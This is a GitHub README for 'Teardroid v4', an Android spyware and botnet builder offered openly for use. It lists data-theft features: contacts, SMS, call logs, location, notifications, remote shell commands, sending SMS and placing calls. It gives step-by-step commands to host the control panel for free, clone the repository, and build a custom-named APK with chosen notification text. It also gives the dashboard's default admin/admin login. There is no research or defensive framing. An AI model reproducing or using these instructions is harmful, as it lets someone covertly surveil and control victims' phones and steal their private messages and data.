Skip to content

It's easy to use android botnet work without port forwarding, vps and android studio

License

Notifications You must be signed in to change notification settings

swagkarna/Teardroid-phprat

 
 

Repository files navigation

Teardroid v4

Screenshot

It's easy to use android botnet work without port forwarding, vps and android studio

Features

  • Retrive Contact
  • Retrive SMS
  • Retrive Services
  • Retrive Device Location (Only work when the app is open on newer devices)
  • Retrive Call Logs
  • Run Shell Command
  • Change Wallpaper
  • Send SMS
  • Make Call
  • Get Installed Apps
  • Download File
  • Read Notification
  • Auto-Start (May not work on a couple of devices)

Requirement

  • Python3
  • Java
  • Linux or Windows os

Java version i used

$ java -version
openjdk version "11.0.13" 2021-10-19
OpenJDK Runtime Environment (build 11.0.13+8)
OpenJDK 64-Bit Server VM (build 11.0.13+8, mixed mode)

How to setup

  • Set up an account at deta.sh its free.
  • Click Deploy to Deta Button to configure your control panel.
  • Clone Teardroid-phprat repo with the following command.
$ git clone https://github.com/ScRiPt1337/Teardroid-phprat
  • cd in the Teardroid-phprat directory, then type the command below to install all dependencies
$ pip install -r requirements.txt
  • Run the following command to see the options that we can use with the builder.
$ python Teardroid.py                                                                                                         
  ______                    __           _     __         __ __
 /_  __/__  ____ __________/ /________  (_)___/ /  _   __/ // /
  / / / _ \/ __ `/ ___/ __  / ___/ __ \/ / __  /  | | / / // /_
 / / /  __/ /_/ / /  / /_/ / /  / /_/ / / /_/ /   | |/ /__  __/
/_/  \___/\__,_/_/   \__,_/_/   \____/_/\__,_/    |___/  /_/   
                                                               

usage: Teardroid.py [-h] [-v] [-b]

Teardroid v4.0 - A tool to build teardroid spyware for Android devices.

options:
  -h, --help     show this help message and exit
  -v, --version  Version of Teardroid
  -b , --build   Build Teardroid with custom name [ex: Teardroid.py -b teardroid]
  • To create an apk execute the following command.
$ python Teardroid.py -b your_app_name
  • It will prompt you with your Control Panel url enter your deta micro URL (without / at the end of the url).
  • You will also be prompted for the title and text of the notification. Enter what you want to display on the notification.
  • DONE

Deploy

Build using bot

Manually deploy the Teardroid control panel

  • Set up an account at deta.sh
  • Install Deta Cli
  • Logging in to Deta via the CLI
  • Create a new Python Micro
  • Clone Teardroidv4_api repo
  • Move all Teardroidv4_api Files to your deta micro folder.
  • Deploy the Control panel using the following command.
$ deta deploy

Dashboard

  • visit : https://{your server url}/v4/overview
  • defualt username/password is : admin/admin

Screenshot

  • Builder

  • Overview

  • TaskManager

Demo Video

Support me

"Buy Me A Coffee"

Contact info

About

It's easy to use android botnet work without port forwarding, vps and android studio

Resources

License

Code of conduct

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Smali 99.9%
  • Other 0.1%